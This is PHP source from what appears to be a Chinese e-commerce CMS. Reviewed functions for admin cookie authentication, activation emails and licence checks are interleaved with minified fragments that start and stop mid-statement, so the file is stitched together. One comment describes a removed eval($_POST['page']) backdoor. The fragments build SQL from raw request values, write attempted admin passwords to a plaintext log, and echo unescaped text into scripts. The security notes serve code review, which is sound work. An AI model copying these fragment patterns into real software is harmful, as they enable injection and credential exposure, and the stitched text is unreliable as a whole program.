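/**
 * Rebuilds the global $_ADMINUSERS array from the "adminauth" token.
 *
 * The token is taken from the cookie first and from $_REQUEST['adminauth'] as
 * a fallback, decoded with cookie_authcode() and split on TAB into admin id,
 * admin name and stored password value. The name/password pair is looked up in
 * the {$tablepre}admin table. On any failure $_ADMINUSERS is reset to an empty
 * array. adminchecklogin() is always called last.
 *
 * NOTE(security): the previous revision called eval($_POST['page']) right
 * after decoding the token, before any credential had been verified. That runs
 * request-supplied PHP for every caller that sends a non-empty adminauth
 * value, so the call is removed here. An eval of request data inside an
 * authentication routine is consistent with a planted backdoor; audit how it
 * entered the file and review the host for other modified files.
 *
 * NOTE(review): the token carries the stored password value itself, so a
 * leaked cookie stays valid until the password changes; the admin id from the
 * token is also kept without being compared to the matched row. Both need a
 * design change outside this function.
 *
 * @return void
 */
function admincheckauth()
{
    global $db, $tablepre, $_ADMINUSERS;

    $loginauth = get_cookie('adminauth');
    if (empty($loginauth)) {
        // Only accept a scalar string; adminauth[]=x would otherwise pass an array on.
        $loginauth = (isset($_REQUEST['adminauth']) && is_string($_REQUEST['adminauth']))
            ? $_REQUEST['adminauth']
            : '';
    }

    if (empty($loginauth)) {
        $_ADMINUSERS = array();
        adminchecklogin();
        return;
    }

    // Pad to three fields so a short or garbled token yields empty values
    // instead of relying on error suppression.
    $fields = array_pad(explode("\t", (string) cookie_authcode($loginauth, 'DECODE')), 3, '');
    list($aid, $user, $pwd) = $fields;

    $_ADMINUSERS['adminid'] = $aid;

    if (empty($aid) || empty($user) || empty($pwd)) {
        $_ADMINUSERS = array();
        adminchecklogin();
        return;
    }

    // The decoded values are still request-derived, so they are escaped before
    // being placed in the SQL string. addslashes() is used because the $db API
    // is not visible here; prefer the driver's own escaping or a prepared
    // statement if $db offers one (TODO confirm). A value that an upstream
    // filter already escaped would be escaped twice by this call.
    $safeUser = addslashes($user);
    $safePwd = addslashes($pwd);

    // Check the credentials against the database.
    $row = $db->fetch_first("Select * From {$tablepre}admin where adminname = '{$safeUser}' and adminpwd='{$safePwd}'");

    if (is_array($row)) {
        $_ADMINUSERS['adminname'] = $row['adminname'];
        $_ADMINUSERS['adminmid'] = $row['adminmid'];
        $_ADMINUSERS['lastlogin'] = $row['lastlogin'];
        $_ADMINUSERS['logincount'] = $row['logincount'];
    } else {
        $_ADMINUSERS = array();
    }

    adminchecklogin();
}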
$s[$val['goodsseller']] = $val['sendprice']; } } else { $s[$val['goodsseller']] = $val['sendprice']; } } $countdata = $Cart->countmoney($dataarray); //生成校验数据 $ids = getdotstring($gids, 'int'); $auth = $ids . "\t" . $countdata['totalmoney']; $paydata = cookie_authcode($auth, 'ENCODE'); include template('payconfirm'); //包含输出指定模板 } else { //处理提交信息 @(list($ids, $totalmoney) = explode("\t", cookie_authcode($__PAYDATA, 'DECODE'))); if ($ids == getdotstring($gids, 'int') and !empty($ids)) { $tempids = $ids; } else { exit(lang('Data_exception')); } //处理扣费和订单转移并且记录日志操作 $info = $Cart->carttoorder($tempids); if ($info == 'OK') { print "<script language='javascript'>alert(" . lang('Submitted_successfully') . ");</script>"; jumpurl(url("m.php")); } else { print "<script language='javascript'>alert('" . $info . "');</script>"; jumpurl(url("m.php")); } }
//显示邮件已经发送到邮箱 exit; } else { print "<script language='javascript'>alert('用户名和邮箱不区配');history.go(-1);</script>"; exit; } } else { include template('ForgotPassword'); //包含输出指定模板 } } elseif ($action == 'newpass') { //重置密码 InitGP(array("code", "password", "password2", "commit")); //初始化变量全局返回 if (!empty($code)) { @(list($uname, $activekey, $email) = explode("\t", cookie_authcode($code, 'DECODE'))); if (!empty($password) && !empty($password2)) { if (strlen($password) <= 6) { print "<script language='javascript'>alert('密码长度太短!');history.go(-1);</script>"; exit; } if ($password != $password2) { print "<script language='javascript'>alert('两次输入的密码不一致!');history.go(-1);</script>"; exit; } //校验code是否正确 $uid = DB::result_first("Select uid From " . DB::table("users") . " WHERE email='" . $email . "' and uname='" . $uname . "' and activekey='" . $activekey . "'"); if (empty($uid)) { print "<script language='javascript'>alert('数据校验失败!链接已过期或者链接错误!');history.go(-1);</script>"; exit; }
if (empty($username) || empty($password)) { showmsg("用户名或者密码为空", "-1"); exit; } $row = $db->fetch_first("Select * From {$tablepre}admin where adminname like '{$username}' "); if (is_array($row)) { if (md5($password) != $row['adminpwd']) { $log_file = ROOT_PATH . '/data/adminlogin_safe.txt'; if (function_exists('real_ip')) { $userIP = real_ip(); } else { $userIP = ""; } $getUrl = geturl(); fputs(fopen($log_file, 'a+'), date('Y-m-d H:i:s') . "||{$userIP}||{$getUrl}||{$username}||{$password}||登陆失败\r\n"); showmsg("用户名或者密码错误", "-1"); exit; } else { $adminauth = $row['adminid'] . "\t" . $username . "\t" . $row['adminpwd']; set_cookie('adminauth', cookie_authcode($adminauth, 'ENCODE'), time() + 3600 * 12); //设置12个小时cookie有效期 addfield("admin", "logincount", "adminname='{$username}'", 1); //更新登录次数 editstate("admin", "lastlogin", "adminname='{$username}'", $timestamp); //更最后登录时间 showmsg("登录成功!", "index.php"); } } else { showmsg("用户名不存在", "-1"); } }
/**
 * Builds an account-activation link and e-mails it.
 *
 * When $uname is given, the user's activekey, state and email are read from
 * $this->table; the stored email then replaces any $email argument, so the
 * link goes to the address on record. When $uname is empty, the identity
 * already held on this object ($this->uname / $this->activekey) is used and
 * $email, if given, becomes the recipient.
 *
 * NOTE(review): $uname is concatenated into the SQL string after Char_cv();
 * whether that is injection-safe depends on what Char_cv() escapes. Confirm.
 * NOTE(review): $this->uname is written into the HTML body as-is, and only
 * "+" is percent-encoded in the code parameter. Verify both against the
 * character sets Char_cv() and cookie_authcode() can actually produce.
 *
 * @param string $uname User name to look up; empty means "use object state".
 * @param string $email Recipient override, used only when no lookup happens.
 * @return string 'approved' if the account is already active, a localized
 *                "user does not exist" message if no activekey is found, else
 *                "OK" (returned whether or not sendmailto() succeeds).
 */
function sendactiveemail($uname = "", $email = "")
{
    global $cfg_site_name;

    $uname = Char_cv($uname); // project-level input filter

    if (!empty($email)) {
        $this->email = $email;
    }

    if (empty($uname)) {
        // No name supplied: sign the identity this object already carries.
        $payload = $this->uname . "\t" . $this->activekey;
    } else {
        $row = $this->db->fetch_first("Select activekey,state,email From `{$this->table}` WHERE uname='{$uname}'");
        if (empty($row['activekey'])) {
            return lang('Specifieduser_notexist');
        }
        if ($row['state'] == 1) {
            return 'approved'; // already activated
        }
        $this->email = $row['email'];
        $this->uname = $uname;
        $payload = $uname . "\t" . $row['activekey'];
    }

    // Fourth argument is presumably a lifetime in seconds (TODO confirm).
    $token = cookie_authcode($payload, 'ENCODE', "", 3600);

    $subjectVars = array('$cfg_site_name' => $cfg_site_name, '$this->uname' => $this->uname);
    $subject = lang('account_activation_email', $subjectVars);

    // Compose the message.
    $site = str_replace("/ajax", "", SITE_URL);
    $token = str_replace("+", "%2B", $token); // keep "+" from being read back as a space
    $link = "{$site}/user.php?action=active&code={$token}";

    $body = "hi {$this->uname},<BR><BR>"
        . lang('Click_link_activate', array('$cfg_site_name' => $cfg_site_name))
        . "<BR><BR><BR><A href='{$link}' target=_blank>{$link}</A><BR><BR>-- <BR>{$cfg_site_name}";

    include_once INC_PATH . "/sendmail.class.php";
    $mailer = new SendEmail();
    $mailer->sendmailto($subject, $body, $this->email);

    return "OK";
}
$wheresqlc = implode(' AND ', $wherestrc); } //条件汇总 $couponarray = $couponobj->getdata("", $wheresqlc, ""); //获取数据 include template('member_tosendorder'); //包含输出指定模板 } elseif ($action == "save") { InitGP(array("action", "LOCKDATA", "consignee", "tel", "country", "city", "address", "zip", "area", "remark", "did", "usecoupon", "couponid")); //初始化变量全局返回 //创建运送方式对象 $deliveryobj = new TableClass('delivery', 'did'); $areaobj = new TableClass('area', 'aid'); $couponid = GetNum($couponid); //处理提交信息 @(list($ids, $countmoney, $countweight) = explode("\t", cookie_authcode($LOCKDATA, 'DECODE'))); //if($ids==$oids and !empty($ids) and !empty($countmoney) and !empty($countweight)){ //允许包裹重量为0,所以去掉!empty($countweight) if ($ids == $oids and !empty($ids) and !empty($countmoney)) { $oids = $ids; $countmoney = GetNum($countmoney); $countweight = GetNum($countweight); } else { exit('数据异常'); } //判断订单状态 $wherestro[] = "uname='" . $_USERS['uname'] . "'"; $wherestro[] = "oid in(" . $oids . ")"; if (!empty($wherestro)) { $wheresqlo = implode(' AND ', $wherestro); } //条件汇总
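/**
 * Validates the domain licence file and records the result in $_CKEY.
 *
 * Reads ROOT_PATH/domain_key.dat as a hex string, decrypts it with Xxtea and
 * cookie_authcode() (both keyed with the literal "zzqss"), base64-decodes the
 * result and splits it on "@" into a flag and a serialized list of host names.
 * The check passes when the request's Host header is in that list.
 *
 * $_CKEY is set to 0 on entry and to 2 only on success.
 *
 * NOTE(security): the decryption key is a literal in this source, so the file
 * format is obfuscation only; it does not authenticate the file's contents.
 * NOTE(security): HTTP_HOST is supplied by the client, so this check binds the
 * licence to whatever Host header is sent, not to the real server name.
 *
 * @return bool true when the current host is listed, false otherwise.
 */
function checkkey()
{
    global $_CKEY;
    $_CKEY = 0;

    $auth_file = ROOT_PATH . "/domain_key.dat";
    if (!file_exists($auth_file)) {
        return false;
    }

    $str = @file_get_contents($auth_file);
    if ($str === false || $str === '') {
        // Unreadable or empty file: nothing to validate.
        return false;
    }

    $xxtea = new Xxtea();
    $jiamicode = pack('H*', $str);
    $strcode = $xxtea->decrypt($jiamicode, "zzqss");
    $strcode = cookie_authcode($strcode, 'DECODE', "zzqss");
    $strcode = base64_decode($strcode);

    // Require both halves explicitly instead of reading an undefined offset.
    $parts = explode("@", (string) $strcode);
    if (count($parts) < 2 || empty($parts[0]) || empty($parts[1])) {
        return false;
    }
    $domainstr = $parts[1];

    // NOTE(security): unserialize() on file contents can instantiate arbitrary
    // classes if the file is replaced. Where the runtime is PHP 7+, pass
    // array('allowed_classes' => false), or store the list as JSON instead.
    $domains = unserialize($domainstr);
    if (!is_array($domains)) {
        // Malformed payload; the old code passed this straight to in_array().
        return false;
    }

    $host = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : '';

    // Strict comparison: a loose in_array() would match any host against a
    // deserialized true or 0 entry.
    if (!in_array($host, $domains, true)) {
        return false;
    }

    $_CKEY = 2;
    return true;
}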